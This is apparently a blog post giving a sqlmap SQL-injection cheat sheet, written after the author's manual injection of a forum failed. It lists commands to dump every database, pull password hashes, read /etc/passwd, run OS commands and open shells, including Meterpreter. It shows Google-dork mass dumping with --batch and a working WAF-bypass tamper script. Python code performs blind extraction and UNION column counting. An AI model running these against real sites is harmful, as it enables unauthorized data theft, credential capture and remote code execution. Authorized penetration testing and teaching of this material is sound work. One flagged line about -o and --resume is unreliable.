sqlmap injection usage

A forum I was testing could not be exploited by manual injection and I had run out of ideas, so I spent some time learning sqlmap and am recording the usage here.

sqlmap -u http://url/news?id=1 --current-user                                    # current database user
sqlmap -u http://www.xxoo.com/news?id=1 --current-db                             # current database
sqlmap -u http://www.xxoo.com/news?id=1 --tables -D db_name                      # list the tables of database db_name
sqlmap -u http://url/news?id=1 --columns -T tablename -D db_name -v 0            # list the columns of a table (e.g. -T users)
sqlmap -u http://url/news?id=1 --dump -C column_name -T table_name -D db_name -v 0   # dump the contents of one column
******************Information gathering******************
sqlmap -u http://url/news?id=1 --dbms mysql --users            # --dbms forces the back-end DBMS type instead of fingerprinting it
sqlmap -u http://url/news?id=1 --users                         # database users
sqlmap -u http://url/news?id=1 --dbs                           # databases
sqlmap -u http://url/news?id=1 --passwords                     # password hashes of the database users
sqlmap -u http://url/news?id=1 --passwords -U root -v 0        # password hash of one database user
sqlmap -u http://url/news?id=1 --dump -C password,user,id -T tablename -D db_name --start 1 --stop 20
                                                               # dump the given columns, rows 1 to 20 only
sqlmap -u http://url/news?id=1 --dump-all -v 0                 # dump every table of every database
sqlmap -u http://url/news?id=1 --privileges                    # privileges of the database users
sqlmap -u http://url/news?id=1 --privileges -U root            # privileges of one user
sqlmap -u http://url/news?id=1 --is-dba -v 1                   # is the current user a DBA?
sqlmap -u http://url/news?id=1 --roles                         # roles of the database users
sqlmap -u http://url/news?id=1 --udf-inject                    # inject user-defined functions (the route to OS-level access, see --os-* below)
sqlmap -u http://url/news?id=1 --dump-all --exclude-sysdbs -v 0   # dump everything except the system databases
sqlmap -u http://url/news?id=1 --union-cols 1-10               # range of column counts to try for UNION query injection (1-10 is an example range)
sqlmap -u http://url/news?id=1 --cookie COOKIE_VALUE           # send a cookie; cookie parameters are only tested for injection at --level 2 or higher
sqlmap -u http://url/news?id=1 -b                              # DBMS banner
sqlmap -u http://url/news?id=1 --data id=3                     # POST injection: --data turns the request into a POST with this body
sqlmap -u http://url/news?id=1 -v 1 -f                         # extensive DBMS version fingerprint
sqlmap -u http://url/news?id=1 --proxy http://127.0.0.1:8118   # send all requests through an HTTP proxy
sqlmap -u http://url/news?id=1 --string STRING_ON_TRUE_PAGE    # string that appears in the page only when the injected condition is true (boolean-based blind)
sqlmap -u http://url/news?id=1 --sql-shell                     # interactive SQL shell
sqlmap -u http://url/news?id=1 --file-read /etc/passwd         # read a file from the DBMS host's file system
sqlmap -u http://url/news?id=1 --os-cmd=whoami                 # run an operating system command
sqlmap -u http://url/news?id=1 --os-shell                      # interactive OS shell
sqlmap -u http://url/news?id=1 --os-pwn                        # out-of-band shell (Meterpreter or VNC through Metasploit)
sqlmap -u http://url/news?id=1 --reg-read                      # read a Windows registry key value
sqlmap -u http://url/news?id=1 --dbs -o sqlmap.log             # save progress
sqlmap -u http://url/news?id=1 --dbs -o sqlmap.log --resume    # resume from the saved progress
Note on the last two lines: in the option reference further down, -o is the optimization switch and the session file is -s SESSIONFILE, so check sqlmap -h for your version before relying on them.
***********Other usage*************
-p name                                      e.g. for index.php?n_id=1&name=2&data=2020, test only the name parameter
sqlmap -g "GOOGLEDORK" --dump-all --batch    # take the targets from Google dork results and dump everything without prompting; needs access to google.com
--technique selects the injection technique(s) to use.
If it is not given, all techniques are tried (default BEUST):
• B: boolean-based blind SQL injection
• E: error-based SQL injection
• U: UNION query SQL injection
• S: stacked queries SQL injection
• T: time-based blind SQL injection
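To make techniques B and U concrete, here is an added example that is not sqlmap's code and not part of the original page. It reduces boolean-based blind extraction (B) and UNION column-count detection (U) to their core loops against a deliberately vulnerable query function. The table, its contents and the TRUE_MARKER string are constructed for the example; the extractor only sees whether the marker appears in the page, which is exactly the signal --string gives sqlmap. Technique T is the same loop with the oracle replaced by "did the response take at least --time-sec seconds".

```python
"""Boolean-based blind extraction and UNION column counting, as an added
example (not sqlmap's own code). SQLite in memory stands in for the target."""
import sqlite3

TRUE_MARKER = "Welcome back"   # what you would pass to --string

# Constructed sample data: one user whose secret we will pull out blind.
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t!')")
_conn.commit()

STATS = {"requests": 0}   # how many "HTTP requests" the attack cost


def vulnerable_page(user_id):
    """Simulates news?id=<user_id>: the id is concatenated into the SQL."""
    sql = "SELECT name FROM users WHERE id=" + user_id
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "Database error"
    return f"{TRUE_MARKER}, {row[0]}" if row else "No such user"


def probe(injected_id):
    """One request to the target; only the page text comes back."""
    STATS["requests"] += 1
    return vulnerable_page(injected_id)


def oracle(condition):
    """Technique B: AND the condition onto the original WHERE clause and see
    whether the 'true page' marker survives."""
    return TRUE_MARKER in probe(f"1 AND ({condition})")


def extract_string(expr, first=1, last=256):
    """Recover the value of a SQL expression (typically a subquery) one
    character at a time, bisecting over code points 0..127 (7 oracle
    questions per character). first/last mirror sqlmap's --first/--last."""
    out = []
    for pos in range(first, last + 1):
        if not oracle(f"length(({expr})) >= {pos}"):
            break                       # past the end of the value
        lo, hi = 0, 127                 # the character's code point is in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def find_union_columns(max_cols=10):
    """Technique U, what --union-cols/--union-char automate: append a UNION
    with a growing list of NULLs until the page no longer breaks."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if TRUE_MARKER in probe(f"1 UNION ALL SELECT {nulls}"):
            return n
    return None


def demo():
    """Pull the admin secret blind; returns (value, requests used)."""
    STATS["requests"] = 0
    value = extract_string("SELECT secret FROM users WHERE id=1")
    return value, STATS["requests"]


if __name__ == "__main__":
    secret, n = demo()
    print(f"extracted {secret!r} in {n} requests; UNION needs {find_union_columns()} column(s)")
```

The request count is what makes --level, --threads and --time-sec matter in practice: a 7-character value costs 7 length probes plus 7 bisection steps per character, and every probe is a full round trip. sqlmap's real implementation adds a baseline comparison of the page (--text-only, --regexp) instead of a fixed marker, but the inference loop is the same.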
--tamper applies tamper scripts to the injection payload; they exist to get past web application firewalls (WAF). sqlmap's default string-escaping mechanism already rewrites string constants with CHAR(), and tamper scripts add further rewrites on top of that.
The --tamper scripts live in the directory
\sqlmap-dev\tamper
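Tamper scripts are ordinary Python modules placed in that directory and selected by file name, e.g. --tamper=space2inlinecomment_example (comma-separated for several). The module below is an added example written for this page, not one of the scripts sqlmap ships; the file name is hypothetical. It shows the complete interface every tamper script exposes: a module-level __priority__, an optional dependencies() hook, and tamper(payload, **kwargs) returning the rewritten payload. The rewrite here replaces spaces outside string literals with an inline comment, the edge case a naive str.replace gets wrong, because a space inside 'x y' must stay a space.

```python
"""space2inlinecomment_example.py: a minimal sqlmap tamper script (added
example, not part of sqlmap). Drop it into the tamper/ directory and pass
--tamper=space2inlinecomment_example."""

try:
    # Available when sqlmap imports the script; lets it order several scripts.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.LOW
except ImportError:
    # Stand-alone (tests, manual runs): sqlmap's lib/ is not on sys.path.
    __priority__ = 1


def dependencies():
    """sqlmap calls this once; real scripts use it to warn about DBMS limits."""
    pass


def tamper(payload, **kwargs):
    """Replace every space that is not inside a quoted string with /**/.

    Example:  1 AND 'x y'='x y'  ->  1/**/AND/**/'x y'='x y'
    kwargs (headers etc.) are accepted for interface compatibility and unused.
    """
    if not payload:
        return payload

    out = []
    in_single = in_double = False
    for ch in payload:
        # Track quoting state so literals are left untouched.
        if ch == "'" and not in_double:
            in_single = not in_single
        elif ch == '"' and not in_single:
            in_double = not in_double

        if ch == " " and not (in_single or in_double):
            out.append("/**/")
        else:
            out.append(ch)
    return "".join(out)
```

Whether this helps at all depends on what the WAF keys on; a rule that normalises comments before matching will not be fooled, so confirm the bypass manually (e.g. with --proxy into an intercepting proxy) before running a long enumeration through it.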
sqlmap -u http://www.2cto.com/news?id=1 --smart --level 3 --users   # --smart: only run thorough tests when the heuristics are positive; --level 3 raises the number of tests (1-5)
Example (quote the URL so the shell does not treat & as a job separator):
sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string=Surname --dbms=mysql --users --passwords
Reference: http://sqlmap.sourceforge.net/doc/README.html
***********Installing the latest version*************
On Ubuntu, apt-get install sqlmap gives version 0.6; the svn checkout gives 1.0:
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
It lands in /home/<user>/sqlmap-dev/sqlmap.py. Typing /home/<user>/sqlmap-dev/sqlmap.py --version with the full path every time is clumsy, so add an alias to .bashrc:
vim /home/<user>/.bashrc
# append at the end of the file:
alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'   # only takes effect for the current user
To make it available to every user, edit the global profile instead:
vim /etc/profile
# same line as above:
alias sqlmap='python /home/seclab/sqlmap-dev/sqlmap.py'   # takes effect at the next login
******************windows 7 (x64) sqlmap install (SVN)************
Install Python from http://www.python.org/getit/
Install a Windows svn client from http://www.sliksvn.com/en/download
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
This installs sqlmap into sqlmap-dev.
* Options
--version             Show the program's version number and exit
-h, --help            Show this help message and exit
-v VERBOSE            Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be specified to set the target URL.
-d DIRECT             Connection string for a direct database connection
-u URL, --url=URL     Target URL
-l LIST               Parse targets from Burp or WebScarab proxy logs
-r REQUESTFILE        Load an HTTP request from a file
-g GOOGLEDORK         Process Google dork results as target URLs
-c CONFIGFILE         Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target URL.
--data=DATA           Data string to be sent through POST
--cookie=COOKIE       HTTP Cookie header
--cookie-urlencode    URL-encode generated cookie injections
--drop-set-cookie     Ignore the Set-Cookie header from the response
--user-agent=AGENT    HTTP User-Agent header
--random-agent        Use a randomly selected HTTP User-Agent header
--referer=REFERER     HTTP Referer header
--headers=HEADERS     Extra HTTP headers, newline separated
--auth-type=ATYPE     HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED     HTTP authentication credentials (name:password)
--auth-cert=ACERT     HTTP authentication certificate (key_file,cert_file)
--proxy=PROXY         Use an HTTP proxy to connect to the target URL
--proxy-cred=PCRED    HTTP proxy authentication credentials (name:password)
--ignore-proxy        Ignore the system default HTTP proxy
--delay=DELAY         Delay in seconds between each HTTP request
--timeout=TIMEOUT     Seconds to wait before the connection times out (default 30)
--retries=RETRIES     Retries when the connection times out (default 3)
--scope=SCOPE         Regexp to filter targets from the provided proxy log
--safe-url=SAFURL     URL address to visit frequently during testing
--safe-freq=SAFREQ    Test requests between two visits to the safe URL
Optimization:
These options can be used to optimize sqlmap's performance.
-o                    Turn on all optimization switches
--predict-output      Predict common query output
--keep-alive          Use persistent HTTP(s) connections
--null-connection     Retrieve the page length without the actual HTTP response body
--threads=THREADS     Maximum number of concurrent HTTP(s) requests (default 1)
Injection:
These options can be used to specify which parameters to test, to provide custom injection payloads and optional tampering scripts.
-p TESTPARAMETER      Testable parameter(s)
--dbms=DBMS           Force the back-end DBMS to this value
--os=OS               Force the back-end DBMS operating system to this value
--prefix=PREFIX       Injection payload prefix string
--suffix=SUFFIX       Injection payload suffix string
--tamper=TAMPER       Use the given script(s) for tampering injection data
Detection:
These options can be used to specify how to parse and compare page content from HTTP responses when using the blind SQL injection technique.
--level=LEVEL         Level of tests to perform (1-5, default 1)
--risk=RISK           Risk of tests to perform (0-3, default 1)
--string=STRING       String to match in the page when the query is valid
--regexp=REGEXP       Regexp to match in the page when the query is valid
--text-only           Compare pages based only on their textual content
Techniques:
These options can be used to tweak the testing of specific SQL injection techniques.
--technique=TECH      SQL injection techniques to test for (default BEUST)
--time-sec=TIMESEC    Seconds to delay the DBMS response (default 5)
--union-cols=UCOLS    Range of columns to test for UNION query SQL injection
--union-char=UCHAR    Character to use for brute-forcing the number of columns
Fingerprint:
-f, --fingerprint     Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. You can also run your own SQL statements.
-b, --banner          Retrieve the DBMS banner
--current-user        Retrieve the DBMS current user
--current-db          Retrieve the DBMS current database
--is-dba              Detect if the DBMS current user is a DBA
--users               Enumerate DBMS users
--passwords           Enumerate DBMS users' password hashes
--privileges          Enumerate DBMS users' privileges
--roles               Enumerate DBMS users' roles
--dbs                 Enumerate DBMS databases
--tables              Enumerate DBMS database tables
--columns             Enumerate DBMS database table columns
--dump                Dump DBMS database table entries
--dump-all            Dump all DBMS databases' table entries
--search              Search column(s), table(s) and/or database name(s)
-D DB                 DBMS database to enumerate
-T TBL                DBMS database table to enumerate
-C COL                DBMS database table column to enumerate
-U USER               DBMS user to enumerate
--exclude-sysdbs      Exclude DBMS system databases when enumerating tables
--start=LIMITSTART    First query output entry to retrieve
--stop=LIMITSTOP      Last query output entry to retrieve
--first=FIRSTCHAR     First query output word character to retrieve
--last=LASTCHAR       Last query output word character to retrieve
--sql-query=QUERY     SQL statement to be executed
--sql-shell           Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute force checks.
--common-tables       Check the existence of common tables
--common-columns      Check the existence of common columns
User-defined function injection:
These options can be used to create custom user-defined functions.
--udf-inject          Inject custom user-defined functions
--shared-lib=SHLIB    Local path of the shared library
File system access:
These options can be used to access the back-end DBMS' underlying file system.
--file-read=RFILE     Read a file from the back-end DBMS file system
--file-write=WFILE    Write a local file to the back-end DBMS file system
--file-dest=DFILE     Back-end DBMS absolute file path to write to
Operating system access:
These options can be used to access the back-end DBMS' underlying operating system.
--os-cmd=OSCMD        Execute an operating system command
--os-shell            Prompt for an interactive operating system shell
--os-pwn              Prompt for an out-of-band shell, Meterpreter or VNC
--os-smbrelay         One-click prompt for an out-of-band shell, Meterpreter or VNC
--os-bof              Stored procedure buffer overflow exploitation
--priv-esc            Database process user privilege escalation
--msf-path=MSFPATH    Local path where the Metasploit Framework is installed
--tmp-path=TMPPATH    Remote absolute path of the temporary files directory
Windows registry access:
These options can be used to access the back-end DBMS' Windows registry.
--reg-read            Read a Windows registry key value
--reg-add             Write a Windows registry key value
--reg-del             Delete a Windows registry key value
--reg-key=REGKEY      Windows registry key
--reg-value=REGVAL    Windows registry key value
--reg-data=REGDATA    Windows registry key value data
--reg-type=REGTYPE    Windows registry key value type
General:
These options can be used to set some general working parameters.
-t TRAFFICFILE        Log all HTTP traffic into a text file
-s SESSIONFILE        Save and resume all data retrieved in a session file
--flush-session       Flush the session file for the current target
--fresh-queries       Ignore query results stored in the session file
--eta                 Display for each output the estimated time of arrival
--update              Update sqlmap
--save                Save options to a configuration INI file
--batch               Never ask for user input, use the default behaviour
Miscellaneous:
--beep                Alert when SQL injection is found
--check-payload       Offline WAF/IPS/IDS payload detection testing
--cleanup             Clean up the DBMS of sqlmap-specific UDFs and tables
--forms               Parse and test forms on the target URL
--gpage=GOOGLEPAGE    Use Google dork results from the specified page number
--page-rank           Display the page rank (PR) of Google dork results
--parse-errors        Parse DBMS error messages from response pages
--replicate           Replicate dumped data into a sqlite3 database
--tor                 Use the default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard              Simple wizard interface for beginner users